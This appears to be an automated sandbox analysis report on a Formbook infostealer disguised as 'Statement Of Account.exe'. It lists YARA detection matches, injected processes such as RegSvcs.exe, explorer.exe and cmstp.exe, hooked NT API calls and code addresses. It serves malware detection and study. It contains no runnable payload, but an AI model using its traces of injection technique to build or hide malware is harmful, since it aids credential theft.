          Source: 0000000B.00000002.1742872490.00000000047D8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY. Matched rule: autogenerated rule brought to you by yara-signator (author: Felix Bilstein - yara-signator at cocacoding dot com)
          Source: 0000000B.00000002.1742872490.00000000047D8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY. Matched rule: detect Formbook in memory (author: JPCERT/CC Incident Response Group)
          Source: 0000000E.00000002.1770021139.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY. Matched rule: Windows_Trojan_Formbook_1112e116 (author: unknown)
          Source: 0000000E.00000002.1770021139.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY. Matched rule: autogenerated rule brought to you by yara-signator (author: Felix Bilstein - yara-signator at cocacoding dot com)
          Source: 0000000E.00000002.1770021139.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY. Matched rule: detect Formbook in memory (author: JPCERT/CC Incident Response Group)
          Source: 0000000F.00000002.2938172951.0000000004610000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY. Matched rule: Windows_Trojan_Formbook_1112e116 (author: unknown)
          Source: 0000000F.00000002.2938172951.0000000004610000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY. Matched rule: autogenerated rule brought to you by yara-signator (author: Felix Bilstein - yara-signator at cocacoding dot com)
          Source: 0000000F.00000002.2938172951.0000000004610000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY. Matched rule: detect Formbook in memory (author: JPCERT/CC Incident Response Group)
          Source: Process Memory Space: Statement Of Account.exe PID: 6744, type: MEMORYSTR. Matched rule: Windows_Trojan_Formbook_1112e116 (author: unknown)
          Source: Process Memory Space: SdYCcXyq.exe PID: 7408, type: MEMORYSTR. Matched rule: Windows_Trojan_Formbook_1112e116 (author: unknown)
          Source: Process Memory Space: RegSvcs.exe PID: 7572, type: MEMORYSTR. Matched rule: Windows_Trojan_Formbook_1112e116 (author: unknown)
          Source: Process Memory Space: cmstp.exe PID: 7592, type: MEMORYSTR. Matched rule: Windows_Trojan_Formbook_1112e116 (author: unknown)
          Source: Process Memory Space: colorcpl.exe PID: 7600, type: MEMORYSTR. Matched rule: Windows_Trojan_Formbook_1112e116 (author: unknown)
          Source: 0.2.Statement Of Account.exe.5b50000.5.raw.unpack, HomeView.cs. Large array initialization: array initializer size 33604
          Source: Statement Of Account.exe, Form1.cs. Long string: length 129808
          Source: SdYCcXyq.exe.0.dr, Form1.cs. Long string: length 129808
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe. Code function: 8_2_00FB2AD0 NtReadFile, LdrInitializeThunk
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe. Code function: 8_2_00FB2BF0 NtAllocateVirtualMemory, LdrInitializeThunk
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe. Code function: 8_2_00FB2B60 NtClose, LdrInitializeThunk
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe. Code function: 8_2_00FB2CA0 NtQueryInformationToken, LdrInitializeThunk
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe. Code function: 8_2_00FB2C70 NtFreeVirtualMemory, LdrInitializeThunk
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe. Code function: 8_2_00FB2DF0 NtQuerySystemInformation, LdrInitializeThunk
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe. Code function: 8_2_00FB2DD0 NtDelayExecution, LdrInitializeThunk
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe. Code function: 8_2_00FB2D30 NtUnmapViewOfSection, LdrInitializeThunk
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe. Code function: 8_2_00FB2D10 NtMapViewOfSection, LdrInitializeThunk
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe. Code function: 8_2_00FB2EA0 NtAdjustPrivilegesToken, LdrInitializeThunk
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe. Code function: 8_2_00FB2E80 NtReadVirtualMemory, LdrInitializeThunk
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe. Code function: 8_2_00FB2FE0 NtCreateFile, LdrInitializeThunk
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe. Code function: 8_2_00FB2FB0 NtResumeThread, LdrInitializeThunk
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe. Code function: 8_2_00FB2F90 NtProtectVirtualMemory, LdrInitializeThunk
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe. Code function: 8_2_00FB2F30 NtCreateSection, LdrInitializeThunk
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe. Code function: 8_2_00FB4340 NtSetContextThread
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe. Code function: 8_2_00FB4650 NtSuspendThread
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe. Code function: 8_2_00FB2AF0 NtWriteFile
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe. Code function: 8_2_00FB2AB0 NtWaitForSingleObject
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe. Code function: 8_2_00FB2BE0 NtQueryValueKey
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe. Code function: 8_2_00FB2BA0 NtEnumerateValueKey
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe. Code function: 8_2_00FB2B80 NtQueryInformationFile
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe. Code function: 8_2_00FB2CF0 NtOpenProcess
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe. Code function: 8_2_00FB2CC0 NtQueryVirtualMemory
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe. Code function: 8_2_00FB2C60 NtCreateKey
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe. Code function: 8_2_00FB2C00 NtQueryInformationProcess
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe. Code function: 8_2_00FB2DB0 NtEnumerateKey
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe. Code function: 8_2_00FB2D00 NtSetInformationFile
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe. Code function: 8_2_00FB2EE0 NtQueueApcThread
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe. Code function: 8_2_00FB2E30 NtWriteVirtualMemory
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe. Code function: 8_2_00FB2FA0 NtQuerySection
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe. Code function: 8_2_00FB2F60 NtCreateProcessEx
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe. Code function: 8_2_00FB3090 NtSetValueKey
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe. Code function: 8_2_00FB3010 NtOpenDirectoryObject
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe. Code function: 8_2_00FB35C0 NtCreateMutant
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe. Code function: 8_2_00FB39B0 NtGetContextThread
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe. Code function: 8_2_00FB3D70 NtOpenThread
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe. Code function: 8_2_00FB3D10 NtOpenProcessToken
          Source: C:\Windows\explorer.exe. Code function: 9_2_0F905E12 NtProtectVirtualMemory
          Source: C:\Windows\explorer.exe. Code function: 9_2_0F904232 NtCreateFile
          Source: C:\Windows\explorer.exe. Code function: 9_2_0F905E0A NtProtectVirtualMemory
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe. Code function: 14_2_0041A360 NtCreateFile
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe. Code function: 14_2_0041A410 NtReadFile
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe. Code function: 14_2_0041A490 NtClose
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe. Code function: 14_2_0041A540 NtAllocateVirtualMemory
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe. Code function: 14_2_0041A35A NtCreateFile
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe. Code function: 14_2_0041A53B NtAllocateVirtualMemory
          Source: C:\Windows\explorer.exeCode function: 9_2_0F41BB309_2_0F41BB30
          Source: C:\Windows\explorer.exeCode function: 9_2_0F41BB329_2_0F41BB32
          Source: C:\Windows\explorer.exeCode function: 9_2_0F4212329_2_0F421232
          Source: C:\Windows\explorer.exeCode function: 9_2_0F418D029_2_0F418D02
          Source: C:\Windows\explorer.exeCode function: 9_2_0F41E9129_2_0F41E912
          Source: C:\Windows\explorer.exeCode function: 9_2_0F4245CD9_2_0F4245CD
          Source: C:\Windows\explorer.exeCode function: 9_2_0F4200369_2_0F420036
          Source: C:\Windows\explorer.exeCode function: 9_2_0F4170829_2_0F417082
          Source: C:\Windows\explorer.exeCode function: 9_2_0F9042329_2_0F904232
          Source: C:\Windows\explorer.exeCode function: 9_2_0F9075CD9_2_0F9075CD
          Source: C:\Windows\explorer.exeCode function: 9_2_0F9019129_2_0F901912
          Source: C:\Windows\explorer.exeCode function: 9_2_0F8FBD029_2_0F8FBD02
          Source: C:\Windows\explorer.exeCode function: 9_2_0F8FEB329_2_0F8FEB32
          Source: C:\Windows\explorer.exeCode function: 9_2_0F8FEB309_2_0F8FEB30
          Source: C:\Windows\explorer.exeCode function: 9_2_0F8FA0829_2_0F8FA082
          Source: C:\Windows\explorer.exeCode function: 9_2_0F9030369_2_0F903036
          Source: C:\Windows\explorer.exeCode function: 9_2_1098B0829_2_1098B082
          Source: C:\Windows\explorer.exeCode function: 9_2_109940369_2_10994036
          Source: C:\Windows\explorer.exeCode function: 9_2_109985CD9_2_109985CD
          Source: C:\Windows\explorer.exeCode function: 9_2_109929129_2_10992912
          Source: C:\Windows\explorer.exeCode function: 9_2_1098CD029_2_1098CD02
          Source: C:\Windows\explorer.exeCode function: 9_2_109952329_2_10995232
          Source: C:\Windows\explorer.exeCode function: 9_2_1098FB309_2_1098FB30
          Source: C:\Windows\explorer.exeCode function: 9_2_1098FB329_2_1098FB32
          Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exeCode function: 11_2_00DADCD411_2_00DADCD4
          Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exeCode function: 11_2_06FC978011_2_06FC9780
          Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exeCode function: 11_2_06FC977811_2_06FC9778
          Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exeCode function: 11_2_06FCB3B811_2_06FCB3B8
          Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exeCode function: 11_2_06FC934811_2_06FC9348
          Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exeCode function: 11_2_06FCAF8011_2_06FCAF80
          Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exeCode function: 11_2_06FCAF6F11_2_06FCAF6F
          Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exeCode function: 11_2_06FC0C5811_2_06FC0C58
          Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exeCode function: 11_2_06FC0C4911_2_06FC0C49
          Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exeCode function: 11_2_06FCBD6811_2_06FCBD68
          Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exeCode function: 11_2_06FC282811_2_06FC2828
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0040102814_2_00401028
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0040103014_2_00401030
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0041D9B714_2_0041D9B7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0041E21414_2_0041E214
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0041ECEE14_2_0041ECEE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_00402D8814_2_00402D88
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_00402D9014_2_00402D90
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_00409E5B14_2_00409E5B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_00409E6014_2_00409E60
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0041D6A414_2_0041D6A4
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_00402FB014_2_00402FB0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014F516C14_2_014F516C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014AF17214_2_014AF172
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014CB1B014_2_014CB1B0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014C000014_2_014C0000
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014C70C014_2_014C70C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014AD34C14_2_014AD34C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014DD2F014_2_014DD2F0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014C52A014_2_014C52A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014B146014_2_014B1460
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014CB73014_2_014CB730
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014BC7C014_2_014BC7C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014B17EC14_2_014B17EC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014C995014_2_014C9950
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014DB95014_2_014DB950
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014D696214_2_014D6962
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014C599014_2_014C5990
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014C29A014_2_014C29A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014C38E014_2_014C38E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014B28F014_2_014B28F0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014EE8F014_2_014EE8F0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014A68B814_2_014A68B8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014FDBF914_2_014FDBF9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01489B8014_2_01489B80
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014BEA8014_2_014BEA80
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014C3D4014_2_014C3D40
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014C8DC014_2_014C8DC0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014D8DBF14_2_014D8DBF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014C0C0014_2_014C0C00
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014D9C2014_2_014D9C20
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014B2FC814_2_014B2FC8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01483FD214_2_01483FD2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01483FD514_2_01483FD5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014CCFE014_2_014CCFE0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014C1F9214_2_014C1F92
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014C0E5914_2_014C0E59
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014D2E9014_2_014D2E90
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014C9EB014_2_014C9EB0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 00FEEA12 appears 37 times
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 00FC7EB0 appears 31 times
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 00FC7E54 appears 116 times
Source: Statement Of Account.exe, 00000000.00000002.1704225673.0000000004B83000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameTyrone.dll8 vs Statement Of Account.exe
Source: Statement Of Account.exe, 00000000.00000000.1668852535.0000000000C34000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameIuBP.exeF vs Statement Of Account.exe
Source: Statement Of Account.exe, 00000000.00000002.1712844282.0000000005B50000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameSimpleLogin.dll8 vs Statement Of Account.exe
Source: Statement Of Account.exe, 00000000.00000002.1717785891.000000000A290000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameTyrone.dll8 vs Statement Of Account.exe
Source: Statement Of Account.exe, 00000000.00000002.1700380760.000000000119E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs Statement Of Account.exe
Source: Statement Of Account.exe | Binary or memory string: OriginalFilenameIuBP.exeF vs Statement Of Account.exe
Source: Statement Of Account.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\cmstp.exe "C:\Windows\SysWOW64\cmstp.exe"
Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\cmstp.exe "C:\Windows\SysWOW64\cmstp.exe"
Source: 14.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 14.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 14.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 14.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 14.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 14.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000F.00000002.2937327062.00000000027B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000F.00000002.2937327062.00000000027B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000F.00000002.2937327062.00000000027B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000F.00000002.2938280316.0000000004640000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000F.00000002.2938280316.0000000004640000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000F.00000002.2938280316.0000000004640000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.1704225673.0000000004129000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000000.00000002.1704225673.0000000004129000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.1704225673.0000000004129000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000010.00000002.1776996971.0000000002C40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000010.00000002.1776996971.0000000002C40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000010.00000002.1776996971.0000000002C40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.2954894231.000000000F91C000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_772cc62d os = windows, severity = x86, creation_date = 2022-05-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8343b5d02d74791ba2d5d52d19a759f761de2b5470d935000bc27ea6c0633f5, id = 772cc62d-345c-42d8-97ab-f67e447ddca4, last_modified = 2022-07-18
Source: 00000000.00000002.1704225673.0000000004969000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000000.00000002.1704225673.0000000004969000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.1704225673.0000000004969000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
